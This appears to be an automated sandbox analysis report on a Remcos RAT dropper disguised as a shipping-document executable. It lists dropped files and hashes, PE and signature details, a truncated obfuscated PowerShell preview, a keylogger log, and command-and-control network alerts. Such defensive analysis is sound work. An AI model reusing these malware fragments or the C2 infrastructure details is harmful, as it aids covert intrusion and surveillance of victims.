                                                    MD5:8AFCC792B0E9516C3B43CCEBEE7EACC1
                                                    SHA1:8C4DDCEA5941F087B85B535FF08AE9ECFFD7607E
                                                    SHA-256:944F29A96DF1077575C114A18F04CF233FD2E6E82BB083A6D7D85CDAF5C7E613
                                                    SHA-512:3FFB0508E68FB675C758E55160FA957EE234A4FC85515C376317FF2641D408433AC295EB628F7155801B1EAF50F4B04A24A3DE14C1C2A43A2BE506A5500A4EA7
                                                    Malicious:false
                                                    Preview:................................................................@...............................x..............................................................................................................................................X...........................................................................................................................A....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%.......................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):501952
                                                    Entropy (8bit):7.515756337598642
                                                    Encrypted:false
                                                    SSDEEP:12288:InPdsC9RjSkcPzD3OH5/AOC0M2WJBbM78jUiMggEsKw6:APdZWkc/3cmOXSI8IiM1Kt
                                                    MD5:DA38292DF7F99C9CF99629E84D934BD6
                                                    SHA1:54BA9688E3E1159F1E1A43D1716F78A0C33665BA
                                                    SHA-256:8950C80B785FE1DCFF01DBB074A337102BF8C76A06314287D4686501617171F3
                                                    SHA-512:BDC88BFCCFE6402C1C45FF68C4860DC7260F54BE3104027AB632516140BF4CEAE9F4382340C974C3D453C115A0C50E4CD6AD59C79DE217274A3ADAE83DCF54BA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                    • Antivirus: Virustotal, Detection: 14%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..................................u....@......................................................... ................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...@...............................rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\spejderlejrene.hum

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):276710
                                                    Entropy (8bit):0.15969803423381917
                                                    Encrypted:false
                                                    SSDEEP:96:Y8nH0PyxSEySqWNnJryMrPle1okR1pVK+W7t49hTc:Y8H0KxrqWxNPle1nR7VKB7t49hY
                                                    MD5:B85779B542E03E21F26DB4C58587204F
                                                    SHA1:BB0BD37AEEC3339DBD8A1BBE8E879549C84E29A0
                                                    SHA-256:BB1827D75495F93A729C94844AD2E17E9E211AEBEE5B6BB8574314C455BA95E6
                                                    SHA-512:9F894F912B040282554A2F8A67CFDDEC7D9AC30739BF4E04E2EE18D440F3287CFBEF45E7B8E7D3F95D846330B457CE5C1FFAB423CB7E30F014EAD29252434FEA
                                                    Malicious:false
                                                    Preview:......................................................................2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Glathvls\rotorklipper\Ergotoxine\Oxaloacetic.Arc

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:ASCII text, with very long lines (58092), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):58092
                                                    Entropy (8bit):5.365528263478254
                                                    Encrypted:false
                                                    SSDEEP:1536:J0dPTiZl3LdPd7SY7T7EpBjQPns5rYLLMb8luJo3:J0tiZjF7XnEvjQPnfLLa8lGo3
                                                    MD5:BE83BBAAAA149CEA1CE61E16AB717EFF
                                                    SHA1:D8EDCA29EAD382CA55D825FC8A69F916680995D6
                                                    SHA-256:B0352970DB8585598F3EA0E38A3E353BD3169D6C8BFFBC43257C1DCBEEF2755B
                                                    SHA-512:D255EDA10EE7B545B169803A521E53883E607F699678A0739E80683A0FFE056048A9E06F458697B350A62812CA736AD36AB42877AB5DA311915AF23FC6072831
                                                    Malicious:true
                                                    Preview:$Flelsernes=$Genforsikredeerapningerne;<#Anales Bjergkders Hydrocorisae #><#Tredjeverdenslands Unperceivable Bustens Folketroens Prioriteternes Emfasernes #><#Deployed Hairweave Snobberi Sverige Nonrecital Hjhus Politikbegreb #><#Equinecessary Diskussionsklubben Defmrkerne Dommervagtsmdernes Pueraria Neje Frstehaandsforklaring #><#Mobulidae hoosierese Basiventral #><#Flyvermekanikeres Hlidhskjalf Archpatron Revaluerer Tortillaer #><#Lansens Unpasted Sippenippet #><#Kurtiser paediatrics Micrurgies Exograph #><#Naut Virtuosa Rubbertens Kymographic Aarhusianerne Gotfreds Plyndrede #><#Humist Leaped Singapore pushout #><#Affdtes Skamslog Subanconeal Brystfinnens Septship Abvolts Bistandshjlps #><#Illimitedness Glutaminic Subfumose Dolken Efterlever Sedimenternes Philatelists #><#Vehefte Jordbrenes Histoid Besmittede #><#Crosshatches Uncontrolling Rrflangen #><#Bismarck distributivt Akvarieplante Freeholdership Dipsomania Imprevisibility Lagertilgange #><#baserede Beroerte Epizoicide Harrov

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Knappet\Depotindehaveren\Politurs\Springsttternes\Overheld.Akt

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):323646
                                                    Entropy (8bit):7.6655796606128055
                                                    Encrypted:false
                                                    SSDEEP:6144:Jaw2Ho20R14B5iK1jqkahRmN7N8AMKLuR5L2ZYAC4iNGx:JawOoVmnZN0OoYO5L6C4oo
                                                    MD5:2928ADC276204326D097DAC0D8911E5E
                                                    SHA1:DF9FC8A3CA73106F40AA421C62650FD17B08B2E4
                                                    SHA-256:2143ACF1161D82C172C9EE492680223F8B036048882501F7E0FCDC15FB4C840F
                                                    SHA-512:6E3C8989875D8EA8A51AFEC379EB6E7B333BF33E89804B47D0E480D3E3266C21A704F31D5B82A8BA4C392FD771566BCCE156EA0D65DEF2088DCB21F3BCF70E88
                                                    Malicious:false
                                                    Preview:...........""......ZZ.................:........&&&..."..........:::..K.FFFFFFFFF.....................................................:.....AAAAAA.......&.&.].....::::........-.............................T.DD...l..eeee.....K.....................88888...........zzz...G........................BB........................^......:.***.............mm........7.{{{.......2....-.b..................`.....I.......88.......<................................].----..........YYY...E.....-..44..............+..l.....3333......................y......VVV..............................}.........'...........^^^........ .................................999.....3....||...8..........ww........................................................GGG....@........~~~~..................nnn.//.......W............i.........*........KKKKKK./...]]]...a............%...4........z..[.).........ss..............................4.rr..yy...........................................uu.......z.........V.?.@.z.**..................::....

                                                    C:\Users\user\AppData\Roaming\fvberms.dat

                                                    Download File
                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.35313624379277
                                                    Encrypted:false
                                                    SSDEEP:3:rhlKlFelJtZl5JWRal2Jl+7R0DAlBG4+LilXIkqoojklovDl6ALilXIkqoojkloC:6lsJtb5YcIeeDAlKe5q1gWAAe5q1gWAv
                                                    MD5:EBD482641F665871B45BFBA1668FD1B8
                                                    SHA1:5136D26E78B8A37AB1713287A4DB8663F528B71A
                                                    SHA-256:98F14C0DF51118C2EE32D7E6719ECCF09574471B22B33AE3353C5E08E36A10F5
                                                    SHA-512:5C7422C820892DAC9367ECE067BF989897C9D073D5AD0794E87F7EC2742C1FCC3014440BBD3D8DAEE607880E0DDBAA262C7901F53CE0129E79382F74E3423DDA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\fvberms.dat, Author: Joe Security
                                                    Preview:....[.2.0.2.4./.0.5./.0.3. .0.9.:.4.3.:.5.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.466140158363459
                                                    Encrypted:false
                                                    SSDEEP:6144:fIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSby:QXD94zWlLZMM6YFHh+y
                                                    MD5:DC7D5797092AC0E59E0456425999CF68
                                                    SHA1:C77A1CA2DE283A4C0C8DBBC13EB82F103F4052BE
                                                    SHA-256:BAB57829C7C4B9BC1676278BF03834790C328CFDBF65DA80404ABAE45C4042DA
                                                    SHA-512:C6B6B2C879E08F6ACF1B831E4AE8CBBF579FBB0CE79B21D45637E7208D5A6F9D488A7BD4C11CE6ACA6459D3950335CF4CA83A5331AAD72DF9DB7EE61B3583A3F
                                                    Malicious:false
                                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..-.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.515756337598642
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File size:501'952 bytes
                                                    MD5:da38292df7f99c9cf99629e84d934bd6
                                                    SHA1:54ba9688e3e1159f1e1a43d1716f78a0c33665ba
                                                    SHA256:8950c80b785fe1dcff01dbb074a337102bf8c76a06314287d4686501617171f3
                                                    SHA512:bdc88bfccfe6402c1c45ff68c4860dc7260f54be3104027ab632516140bf4ceae9f4382340c974c3d453c115a0c50e4cd6ad59c79de217274a3adae83dcf54ba
                                                    SSDEEP:12288:InPdsC9RjSkcPzD3OH5/AOC0M2WJBbM78jUiMggEsKw6:APdZWkc/3cmOXSI8IiM1Kt
                                                    TLSH:7DB4128676A8C062CC920A34CE79E7FE89AC5C14EA990B4F4760FFCF3D727195718196
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....

                                                    File Icon

                                                    Icon Hash:2951ea4c6d0f968e

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x403645
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:E=Kollaboratrer@Nonlister.Te, O=Eddikebrygger, OU="Cinquefoil Grundtvigsk Mehari ", CN=Eddikebrygger, L=Burgdorf, S=Niedersachsen, C=DE
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 26/12/2023 04:10:57 25/12/2026 04:10:57
                                                    Subject Chain
                                                    • E=Kollaboratrer@Nonlister.Te, O=Eddikebrygger, OU="Cinquefoil Grundtvigsk Mehari ", CN=Eddikebrygger, L=Burgdorf, S=Niedersachsen, C=DE
                                                    Version:3
                                                    Thumbprint MD5:B676D6300E2427C986444EABDA349B7E
                                                    Thumbprint SHA-1:7FC200E1A289A092DB86D7F7E1EBC2A330E77CED
                                                    Thumbprint SHA-256:FFA7192124534CFE1315677AAFDA1D5418CF1D620A08FEAE269FF0A3A272D490
                                                    Serial:7C986F579975B52027D7E0DB02FDC8C74C17B765

                                                    Entrypoint Preview

                                                    Instruction
                                                    sub esp, 000003F8h
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebp, ebp
                                                    push 00008001h
                                                    mov dword ptr [esp+20h], ebp
                                                    mov dword ptr [esp+18h], 0040A230h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [004080A0h]
                                                    mov esi, dword ptr [004080A4h]
                                                    lea eax, dword ptr [esp+34h]
                                                    push eax
                                                    mov dword ptr [esp+4Ch], ebp
                                                    mov dword ptr [esp+0000014Ch], ebp
                                                    mov dword ptr [esp+00000150h], ebp
                                                    mov dword ptr [esp+38h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007F6F30CB984Ah
                                                    lea eax, dword ptr [esp+34h]
                                                    mov dword ptr [esp+34h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [esp+48h]
                                                    mov ecx, dword ptr [esp+62h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [esp+0000014Eh], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [esp+00000148h], ax
                                                    cmp dword ptr [esp+38h], 0Ah
                                                    jnc 00007F6F30CB9818h
                                                    and word ptr [esp+42h], 0000h
                                                    mov eax, dword ptr [esp+40h]
                                                    movzx ecx, byte ptr [esp+3Ch]
                                                    mov dword ptr [00429B18h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [esp+38h]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [esp+00000148h]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx
                                                    movzx ecx, byte ptr [esp+0000004Eh]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x21fc0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x790200x18a0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2a0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x4e0000x21fc00x22000b6895077917494c69888f8ec28defac3False0.5621625114889706data5.704065075881836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x4e4480xc828Device independent bitmap graphic, 128 x 256 x 24, image size 51200EnglishUnited States0.1488095238095238
                                                    RT_ICON0x5ac700x874cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902413673634369
                                                    RT_ICON0x633c00x3fd8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9864170337738619
                                                    RT_ICON0x673980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.35
                                                    RT_ICON0x699400x202cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.986401165614376
                                                    RT_ICON0x6b9700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.41580675422138835
                                                    RT_ICON0x6ca180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.4600213219616205
                                                    RT_ICON0x6d8c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5879963898916968
                                                    RT_ICON0x6e1680x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.3871951219512195
                                                    RT_ICON0x6e7d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4190751445086705
                                                    RT_ICON0x6ed380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6019503546099291
                                                    RT_ICON0x6f1a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.5403225806451613
                                                    RT_ICON0x6f4880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.6756756756756757
                                                    RT_DIALOG0x6f5b00x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0x6f6b00x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x6f7d00xc4dataEnglishUnited States0.5918367346938775
                                                    RT_DIALOG0x6f8980x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x6f8f80xbcdataEnglishUnited States0.6382978723404256
                                                    RT_VERSION0x6f9b80x2c4dataEnglishUnited States0.4901129943502825
                                                    RT_MANIFEST0x6fc800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                    Imports

                                                    DLLImport
                                                    ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                    SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                    ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                    USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                    GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                    KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    05/03/24-09:43:53.816926TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response2987149739193.222.96.21192.168.2.4
                                                    05/03/24-09:43:53.300767TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin4973929871192.168.2.4193.222.96.21

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 3, 2024 09:43:49.214324951 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.214353085 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.214432001 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.242537022 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.242558956 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.434140921 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.434351921 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.521544933 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.521564960 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.521917105 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.522013903 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.526468039 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.572118044 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.659770966 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.659836054 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.659917116 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660075903 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660085917 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660180092 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660186052 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660270929 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660367012 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660435915 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660442114 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660506010 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660512924 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660564899 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660578012 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660584927 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660629034 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660715103 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660768986 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660844088 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660849094 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660923004 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660927057 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.660990000 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.660994053 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661048889 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661077023 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661083937 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661134005 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661226034 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661417961 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661500931 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661506891 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661578894 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661602974 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661608934 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661683083 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661706924 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.661712885 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.661807060 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.662324905 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.662414074 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.662436008 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.662444115 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.662528992 CEST49738443192.168.2.4172.67.215.46
                                                    May 3, 2024 09:43:49.662533998 CEST44349738172.67.215.46192.168.2.4
                                                    May 3, 2024 09:43:49.662619114 CEST49738443192.168.2.4172.67.215.46
